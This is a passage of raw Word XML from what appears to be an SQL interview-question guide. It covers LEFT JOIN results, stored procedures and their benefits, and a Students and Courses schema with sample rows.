        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52EDA1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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0154CB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bl>
    <w:p w14:paraId="6149283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retrieve all employees and the departments they belong to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98608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46BC8A3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_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F32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43FF0C6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Departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8BF82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e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BAD79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795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="27F63DB1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58EE82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511B862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C1D2EC5" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA979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CABF68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635DF55A" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36982F7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07625B8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r w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="7E33F118" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="269A5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0A0BB53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29B5181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368D8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c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Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have matching department IDs in the Departments table, so their department names are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845C9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harlie</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not have a matching department ID in the Departments table, so the department_name is returned as </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842377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1F5735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When you want to ensure that all records from the left table are returned, even if there's no corresponding record in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACB5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andling missing data</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful when working with optional relationships, where some records in the left table might not have related records in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F65CF0" w14:textId="0294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3269" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F0A39" w14:textId="795CBA7C" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="795" w:name="_Toc197868009"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00BD197A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored Procedure? What is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>the use of stored procedure</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="795"/>
    </w:p>
    <w:p w14:paraId="3CF04F02" w14:textId="4B5B0982"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What is a Stored Procedure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13C9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haracteristics of Stored Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5126A8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capsulated SQL Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They group multiple SQL queries together to perform a specific task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320C23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put and Output</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They can accept input parameters and return output parameters or results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7B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ecompiled</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The procedure is precompiled and stored in the database, improving performance for repeated executions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC3B6D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usable</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They can be executed multiple times, making them useful for repetitive tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51493E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Stored procedures can handle transactions, meaning they can commit or roll back changes based on specific logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0894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 (Basic Structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF20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procedure_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11CE0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arameter1 datatype, parameter2 datatype, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121949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S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2017C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D3D00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SQL statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6847A0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 FROM table_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC30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UPDATE table_name SET column = value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBE0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More SQL operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF390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3CE8F38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FD412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ere’s a simple stored procedure that retrieves employees in a specific department:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DBA35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GetEmployeesByDepartment (IN dept_id INT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261666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446CB5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name FROM Employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E25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dept_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17656E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293B5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ou would execute the stored procedure with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9F46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ALL GetEmployeesByDepartment(10);  -- Returns employees from department with id 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64219A7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of Stored Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F7D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de Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stored procedures encapsulate repetitive tasks. You can reuse the same procedure in multiple applications or queries, reducing code duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F07E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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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curity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By using stored procedures, you can control access to underlying data. You can grant users permission to execute a procedure without granting direct access to the tables. This enhances data security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637AF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lex Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stored procedures can handle database transactions (e.g., COMMIT, ROLLBACK) to ensure that a series of operations either complete successfully or fail together, maintaining data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA169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 and Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By centralizing logic in stored procedures, you ensure that the same logic is executed in a consistent manner each time, reducing errors and maintaining data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4699C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Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes to business logic can be made in one place (the stored procedure) without needing to update multiple application components or queries. This improves maintainability and simplifies updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886C45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duce Network Traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of sending multiple SQL queries from the application to the database, you can send a single call to execute a stored procedure, reducing network overhead and improving efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526C49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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5011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commerce application where you need to calculate and apply a discount to all items in an order. A stored procedure can be used to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADA4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Validate the order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258540A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pply discounts based on various rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DBA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pdate the order and item prices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9BCE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44B5E954" w14:textId="351487B2" w:rsidR="0025066D"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3270" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777A163" w14:textId="0412DAC8" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="796" w:name="_Toc197868010"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the database schema for Students and Course table</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="796"/>
    </w:p>
    <w:p w14:paraId="6D32217C" w14:textId="4996F626"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Database Schema for Students and Courses Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B8E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o represent a typical relationship between students and courses in a relational database, we generally use two tables: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Student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Courses</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. There can also be a third table, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enrollments</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, to represent the many-to-many relationship between students and courses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C57A3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Students Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF57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students.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDF56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27EBBF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s (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E072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PRIMARY KEY,         -- Unique identifier for each student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0587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 VARCHAR(100),            -- First name of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820075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 VARCHAR(100),             -- Last name of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC76D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date_of_birth DATE,                 -- Date of birth of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5256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ail VARCHAR(100),                 -- Email address of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5067CAC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hone_number VARCHAR(15),           -- Contact number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB64F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was enrolled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD8A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ender VARCHAR(10)                  -- Gender of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296926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2042D4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5C1C9E" w14:paraId="428948DF" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3549931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629DEB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irst_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F4EFC9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ast_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="743CB6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ate_of_birth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5821B77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ail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2089266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hone_number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="489412A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739BF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ender</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3CF2B987" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27BD5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EC5C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7A7CC3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oe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5233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00-01-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B9DB0D6" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="005C1C9E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>john.doe@gmail.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B95B0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234567890</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A97E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09-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69715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le</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3DF28FA6" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46C44F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4222B7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DEA3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mith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C77CBA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999-06-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACE00A6" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidRPr="005C1C9E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>jane.smith@yahoo.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BFB8E6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0987654321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C923AA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8-09-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00E074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emale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D7DAE32"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546989E">
          <v:rect id="_x0000_i3271" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79907FC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Courses Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782669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courses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7316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92043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Courses (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BAC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PRIMARY KEY,           -- Unique identifier for each course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A407F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name VARCHAR(200),            -- Name of the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377018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escription TEXT,             -- Description of the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BCB1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uration VARCHAR(50),         -- Duration of the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B5D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redits INT                          -- Number of credits awarded for the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AD8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F346D1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872"/>
        <w:gridCol w:w="3182"/>
        <w:gridCol w:w="1565"/>
        <w:gridCol w:w="693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="50AEED16" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7949823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14154BA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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="100501A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escription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1CC99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uration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6E9DF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redits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1E2579F2" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61CA557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A3D5B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atabase Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EFF0E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troduction to databases and SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CC7A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 months</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
